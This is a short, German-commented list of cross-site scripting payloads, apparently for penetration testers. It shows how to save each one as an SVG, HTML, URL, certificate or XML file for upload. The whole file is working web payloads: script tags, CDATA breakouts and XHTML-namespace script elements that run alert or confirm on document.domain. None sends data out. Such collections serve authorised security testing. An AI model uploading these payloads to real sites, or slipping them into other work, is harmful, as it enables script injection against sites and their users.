// XSS Injection Beispiele 
// Text Datei erstellen, Beispiel aussuchen und als .svg, html, url, cer, xml speichern.

//.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

//.svg
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

//.svg
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>

//.svg
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>


//.html
<script>alert(1)</script>

//.url
<html>
    <script>alert(document.domain)</script>
</html>

//.cer
<script>alert(1)</script>

//.xml
<html>
	<head></head>
	<body>
		<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
		<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
		<info>
		  <name>
		    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
		  </name>
		    <description>
		      <value>Hello</value>
		    </description>
		    <url>
		      <value>http://google.com</value>
		    </url>
		</info>
	</body>
</html>

// By DaUfooo 2025
